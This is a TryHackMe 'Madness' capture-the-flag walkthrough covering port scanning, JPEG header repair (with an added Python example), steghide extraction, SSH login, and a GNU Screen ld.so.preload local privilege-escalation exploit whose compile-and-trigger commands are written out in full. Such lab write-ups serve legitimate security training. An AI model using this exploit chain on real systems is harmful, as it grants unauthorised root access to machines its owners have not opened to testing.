TryHackMe: Madness

Today we will take a look at TryHackMe: Madness. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

Network scan

Command: sudo nmap -sS -sC -sV -oN nmap/initial 10.10.152.45

Let's check the site.

As you can see, there is a picture icon above. Let’s click on it.

There is no picture. Let's download it and make some changes.

Command: wget http://10.10.152.45/thm.jpg

The .jpg file is corrupted. Let’s fix it.

Command: hexeditor thm.jpg
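The manual hex-editor step above works, but it is easy to patch the wrong bytes. Below is an added example (not from the original writeup) that inspects a JPEG's Start Of Image marker and only rewrites it when the rest of the header still looks like a JPEG; it assumes the damage is confined to those first two bytes, and the sample bytes are constructed, not taken from thm.jpg.

```python
# Added example: check and repair the two-byte Start Of Image (SOI) marker
# that every JPEG must begin with. Assumes the corruption is in those bytes.
SOI = b"\xff\xd8"          # Start Of Image marker
EOI = b"\xff\xd9"          # End Of Image marker
APP_MARKERS = {0xE0: "APP0/JFIF", 0xE1: "APP1/Exif"}


def inspect_jpeg(data: bytes) -> dict:
    """Report what the header looks like without modifying the file."""
    info = {"soi_ok": data[:2] == SOI, "eoi_ok": data.endswith(EOI), "segment": None}
    # The first segment after SOI is normally an APPn marker (FF E0 or FF E1).
    if len(data) >= 4 and data[2] == 0xFF:
        info["segment"] = APP_MARKERS.get(data[3], f"marker 0x{data[3]:02X}")
    return info


def repair_soi(data: bytes) -> bytes:
    """Rewrite the first two bytes to FF D8 when the rest of the header agrees
    that this is a JPEG; refuse (ValueError) rather than patch blindly."""
    if data[:2] == SOI:
        return data
    looks_like_jpeg = (
        len(data) > 10
        and data[2] == 0xFF
        and data[3] in APP_MARKERS
        and data[6:10] in (b"JFIF", b"Exif")
    )
    if not looks_like_jpeg:
        raise ValueError("header does not look like a JPEG; refusing to patch blindly")
    return SOI + data[2:]


# Constructed sample: a minimal JFIF header plus an EOI marker, no real image data.
GOOD = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
        + b"\xff\xd9")
# Constructed corruption: the SOI marker overwritten with two zero bytes.
BAD = b"\x00\x00" + GOOD[2:]

if __name__ == "__main__":
    print("before:", inspect_jpeg(BAD))
    fixed = repair_soi(BAD)
    print("after: ", inspect_jpeg(fixed), "restored:", fixed == GOOD)
```

To use it on a real file, read it with `open(path, "rb").read()`, pass the bytes to `repair_soi`, and write the result to a new file so the original evidence stays untouched.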

Now let’s try again.

We are provided with a hidden directory.

I was just checking and came across something like this.

There was another hint in the source code.

Open Burp Suite and check them one by one.

And that's it. We got different results.

When we look at the site, we get this result.

Maybe we need the image we downloaded again, because this looks like a steganography hint.

Command: steghide info thm.jpg

Command: steghide --extract -sf thm.jpg

Let's try to crack the hash we got.

I tried to access the information we have with SSH, but it didn't work. After a while, I remembered that it was in the form of supplements. Let's check.

We found the password; let's log in.

Privilege Escalation

Command: find / -perm -u=s 2>/dev/null

We see something different. Let’s check the exploit.

I created the files in my terminal and transferred them to the target terminal.

And I entered the commands.

Command: gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c

Command: gcc -o /tmp/rootshell /tmp/rootshell.c

Command: echo "[+] Now we create our /etc/ld.so.preload file..."

Command: cd /etc

Command: umask 000

Command: screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"

Command: echo "[+] Triggering..."

Command: screen -ls

Command: /tmp/rootshell

And now we are root.

"If you have any questions or comments, please do not hesitate to write. Have a good day."

Hello, my name is Elman. I am from Azerbaijan. I wish you a good day.
